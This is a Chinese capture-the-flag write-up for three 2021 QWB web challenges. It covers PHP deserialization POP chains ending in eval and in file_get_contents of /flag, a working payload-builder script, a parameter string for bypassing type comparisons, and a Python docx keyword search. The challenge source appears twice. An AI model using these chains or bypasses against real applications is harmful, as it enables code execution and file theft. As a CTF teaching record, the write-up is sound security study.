强网杯2021部分web wp

0x01 pop_master

打开题目


include"class.php";
//class.php.txt  (the class file is provided for download, see the hint below)
highlight_file(__FILE__);
$a=$_GET['pop'];
$b=$_GET['argv'];
// unserialize() of a raw request parameter: the caller picks the class and every
// property value of the object graph, so any method in class.php becomes reachable.
// This is the root cause the whole challenge is built around.
$class=unserialize($a);
$class->XXXXXX($b);  // placeholder: the challenge calls a randomly generated 6-character method name with argv

根据提示信息 下载源码

我滴个乖乖 2M多的链 16万行

/**
 * One of the generated gadget classes from class.php (the writeup counts ~160k lines of them).
 * Both methods are eval() sinks: whatever string reaches them runs as PHP, so a chain
 * only has to route the `argv` parameter here.
 */
class NXlGlW{
    public $hGYbeeG;   // not read in this excerpt
    public function HRD4CW($y3Cae){
		eval($y3Cae);

    }
    public function C3akk9($MSL6W){
		eval($MSL6W);

    }
}


/**
 * Link gadget: GlSPMd() forwards its argument to a method of whatever object sits in
 * $E0cUWyC, and that object is chosen by the serialized payload. olsElL() is an eval() sink.
 */
class qAARvi{
    public $E0cUWyC;   // next hop of the chain; its class decides which of the two method names exists
    public function GlSPMd($XHiV9){
		$this->BrLVt = "GAVzp";   // writes an undeclared property; looks like generated noise
		if(method_exists($this->E0cUWyC, 'YAF1Wt')) $this->E0cUWyC->YAF1Wt($XHiV9);
		if(method_exists($this->E0cUWyC, 'KfVcH5')) $this->E0cUWyC->KfVcH5($XHiV9);

    }
    public function olsElL($t43I8){
		$this->v35pY = "TNiWd";   // same pattern: undeclared property write, then the sink
		eval($t43I8);

    }
}
//......

函数名、类名均为随机生成，最终链成后用 eval 执行 system("cat /flag");

太菜了不会写脚本，手工找几十个就行了；脚本可以参考大佬们的。

0x02 [强网先锋]赌徒

打开网站 看到一串提示信息,
www.zip 下载源码

<meta charset="utf-8">
<?php
//hint is in hint.php
error_reporting(1);


/**
 * Entry gadget of the chain. unserialize() does not run __construct(), but it does
 * run __wakeup(), and that is what pulls the rest of the object graph in.
 */
class Start
{
    public $name='guest';   // echoed by _sayhello(); an object here is converted through its __toString()
    public $flag='syst3m("cat 127.0.0.1/etc/hint");';   // only ever echoed; "syst3m" is not a PHP function, so this reads like a decoy
	
    public function __construct(){
        echo "I think you need /etc/hint . Before this you need to see the source code";
    }

    // echo of a non-string $name triggers that object's __toString() (Info in the writeup's chain)
    public function _sayhello(){
        echo $this->name;
        return 'ok';
    }

    // runs automatically on unserialize(); the leading "hi" is why the output has to be trimmed before base64-decoding
    public function __wakeup(){
        echo "hi";
        $this->_sayhello();
    }
    // fires on access to an inaccessible or undeclared property; prints $flag and nothing else
    public function __get($cc){
        echo "give you flag : ".$this->flag;
        return ;
    }
}

/**
 * Pivot gadget: Start::_sayhello() echoes this object, so __toString() runs.
 */
class Info
{
    private $phonenumber=123123;   // not read anywhere in this listing
    public $promise='I do';
	
    // a return value from a constructor is discarded by PHP
    public function __construct(){
        $this->promise='I will not !!!!';
        return $this->promise;
    }

    // `file` is not a declared property, so it can only arrive via unserialize(). Reading the
    // undeclared `ffiillee` on the object stored at file['filename'] invokes that object's
    // __get() (Room::__get in the chain); whatever it returns is returned here, and the echoes
    // made on the way have already been emitted by then.
    public function __toString(){
        return $this->file['filename']->ffiillee['ffiilleennaammee'];
    }
}

/**
 * Sink gadget. __get() turns a payload-chosen property into a call and __invoke() turns
 * that call into a file read; that combination is what makes unserialize() of this class dangerous.
 */
class Room
{
    public $filename='/flag';   // path handed to file_get_contents() by __invoke()
    public $sth_to_set;         // unused in this listing
    public $a='';               // called as a function by __get(); an object with __invoke() works here
	
    // fires for undeclared/inaccessible properties; $name is ignored, $this->a is called instead
    public function __get($name){
        $function = $this->a;
        return $function();
    }
	
    // reads an arbitrary path and echoes it base64-encoded; returns null
    public function Get_hint($file){
        $hint=base64_encode(file_get_contents($file));
        echo $hint;
        return ;
    }

    // $content is always null because Get_hint() returns nothing, so the second echo prints an empty string
    public function __invoke(){
        $content = $this->Get_hint($this->filename);
        echo $content;
    }
}

// Request boundary: a serialized object graph is taken straight from the query string.
// unserialize() on untrusted input lets the caller choose any loaded class and its
// property values, which is exactly what the writeup's POP chain relies on.
$payload = $_GET['hello'] ?? null;
if ($payload === null) {
    $hi = new Start();
} else {
    unserialize($payload);
}

?>
<meta charset="utf-8">
<?php
//hint is in hint.php
error_reporting(1);


/**
 * Entry gadget of the chain. unserialize() does not run __construct(), but it does
 * run __wakeup(), and that is what pulls the rest of the object graph in.
 */
class Start
{
    public $name='guest';   // echoed by _sayhello(); an object here is converted through its __toString()
    public $flag='syst3m("cat 127.0.0.1/etc/hint");';   // only ever echoed; "syst3m" is not a PHP function, so this reads like a decoy
	
    public function __construct(){
        echo "I think you need /etc/hint . Before this you need to see the source code";
    }

    // echo of a non-string $name triggers that object's __toString() (Info in the writeup's chain)
    public function _sayhello(){
        echo $this->name;
        return 'ok';
    }

    // runs automatically on unserialize(); the leading "hi" is why the output has to be trimmed before base64-decoding
    public function __wakeup(){
        echo "hi";
        $this->_sayhello();
    }
    // fires on access to an inaccessible or undeclared property; prints $flag and nothing else
    public function __get($cc){
        echo "give you flag : ".$this->flag;
        return ;
    }
}

/**
 * Pivot gadget: Start::_sayhello() echoes this object, so __toString() runs.
 */
class Info
{
    private $phonenumber=123123;   // not read anywhere in this listing
    public $promise='I do';
	
    // a return value from a constructor is discarded by PHP
    public function __construct(){
        $this->promise='I will not !!!!';
        return $this->promise;
    }

    // `file` is not a declared property, so it can only arrive via unserialize(). Reading the
    // undeclared `ffiillee` on the object stored at file['filename'] invokes that object's
    // __get() (Room::__get in the chain); whatever it returns is returned here, and the echoes
    // made on the way have already been emitted by then.
    public function __toString(){
        return $this->file['filename']->ffiillee['ffiilleennaammee'];
    }
}

/**
 * Sink gadget. __get() turns a payload-chosen property into a call and __invoke() turns
 * that call into a file read; that combination is what makes unserialize() of this class dangerous.
 */
class Room
{
    public $filename='/flag';   // path handed to file_get_contents() by __invoke()
    public $sth_to_set;         // unused in this listing
    public $a='';               // called as a function by __get(); an object with __invoke() works here
	
    // fires for undeclared/inaccessible properties; $name is ignored, $this->a is called instead
    public function __get($name){
        $function = $this->a;
        return $function();
    }
	
    // reads an arbitrary path and echoes it base64-encoded; returns null
    public function Get_hint($file){
        $hint=base64_encode(file_get_contents($file));
        echo $hint;
        return ;
    }

    // $content is always null because Get_hint() returns nothing, so the second echo prints an empty string
    public function __invoke(){
        $content = $this->Get_hint($this->filename);
        echo $content;
    }
}

// Request boundary: a serialized object graph is taken straight from the query string.
// unserialize() on untrusted input lets the caller choose any loaded class and its
// property values, which is exactly what the writeup's POP chain relies on.
$payload = $_GET['hello'] ?? null;
if ($payload === null) {
    $hi = new Start();
} else {
    unserialize($payload);
}

?>

很明显是反序列化 POP 链，最终执行 Get_hint 中的 file_get_contents 读取 flag。

__invoke()  //当尝试以调用函数的方式调用一个对象时,__invoke() 方法会被自动调用。
__get()  //当我们试图获取一个不可达属性(比如private)或不存在的属性时,类会自动调用__get函数。
Start => __wakeup => _sayhello => Info => __toString => Room(file['filename']) => __get => Room(a) => __invoke


// Local stand-in for the challenge's Start: no magic methods are needed here, only the
// property set, because the server-side class supplies __wakeup() & co. on unserialize().
// Declaration order is kept as in the challenge so the serialized field order matches.
class Start
{
    public $name='guest';   // replaced by an info object further down
    public $flag='syst3m("cat 127.0.0.1/etc/hint");';
}
// Local stand-in for the challenge's Info. Declared in lower case here, so serialize() emits
// "info"; PHP resolves class names case-insensitively, so the server's Info still matches.
// phonenumber is left out: nothing in the chain reads it.
class info
{
    public $promise;   // not read by the chain
}
// Local stand-in for the challenge's Room. Two instances are used: one stored in
// info::file['filename'] (its missing `ffiillee` property triggers __get), and one in
// that object's `a` (called by __get, which triggers __invoke -> Get_hint('/flag')).
class Room
{
    public $filename='/flag';   // file read by Get_hint() on the server
    public $sth_to_set;
    public $a='';               // overwritten with a Room instance further down

}
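// Assemble the object graph the server-side chain walks:
//   Start::__wakeup -> _sayhello (echo $name) -> info::__toString
//   -> Room::__get (undeclared ffiillee on file['filename']) -> Room::__invoke via $a -> Get_hint('/flag')
// and print its serialized form for the ?hello= parameter.
// Class references use the spelling of the local declarations (`info`, `Start`, `Room`); the
// mixed `start`/`room` spellings only worked because PHP class names are case-insensitive.
$info = new info();
$start = new Start();
$room = new Room();
$start->name = $info;                  // echo $this->name stringifies the info object
$info->file['filename'] = $room;       // undeclared `file` property read by info::__toString
$room->a = new Room();                 // $this->a() inside Room::__get invokes this second Room
echo serialize($start);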
/*
$st=new Start();
$st->name=new info();
$st->name->file['filename']=new Room();
$st->name->file['filename']->a=new Room();
print_r(serialize($st));
*/

记得要把开头的 hi 去掉再解码啊~

0x03 [强⽹先锋]寻宝

key1 常见绕过

ppp[number1]=6666a&ppp[number2]=1e10&ppp[number3]=61823470&ppp[number4]=0abcdef&ppp[number5]=null

第二个文件下载了,提示如下:
Mr.Smith先生和Tang在5月份的时候在一个画展进行了接触,并且在某些地方写下了一些东西
我们将该月有关画展的信息做了汇总,希望你能够从中获取一些信息

压缩包用支持分段下载的下载器都可以下载

文件中有五个图片 干扰我好久

最终发现 key2 以明文形式存在于 docx 中

key2

贴出寻找脚本

import os
from docx import Document
path = r"C:\Users\xxxxx\Desktop\five_month"  # folder holding the downloaded .docx files ("xxxxx" is a placeholder user name)

str_to_search = "KEY2"#input("请输入要搜索的字段:")  -- interactive prompt ("enter the string to search for") left disabled

def search_str_in_paragraph(str_to_search, paragraph):
    """Return the offset of ``str_to_search`` inside ``paragraph.text``.

    Only ``paragraph.text`` is read, so any object exposing a ``text``
    attribute works. Raises ``ValueError`` when the substring is absent,
    exactly like ``str.index``; callers are expected to test membership first.
    """
    text = paragraph.text
    return text.index(str_to_search)

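for root, dirs, files in os.walk(path, topdown=False):
    for file in files:
        # os.path.splitext copes with names that have several dots or none;
        # file.split(".")[1] raised IndexError on extension-less files and
        # mis-read "a.b.docx" as extension "b".
        filename, ext = os.path.splitext(file)
        if ext.lower() != ".docx":
            continue
        full_path = os.path.join(root, file)
        doc = Document(full_path)
        for paragraph in doc.paragraphs:
            text = paragraph.text
            if str_to_search in text:
                str_index = search_str_in_paragraph(str_to_search, paragraph)
                # clamp the lower bound: a negative start would wrap around to the
                # end of the string and print the wrong (often empty) slice
                start = max(0, str_index - 10)
                print(text[start:str_index + 10], "-----", filename, "-----", full_path)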

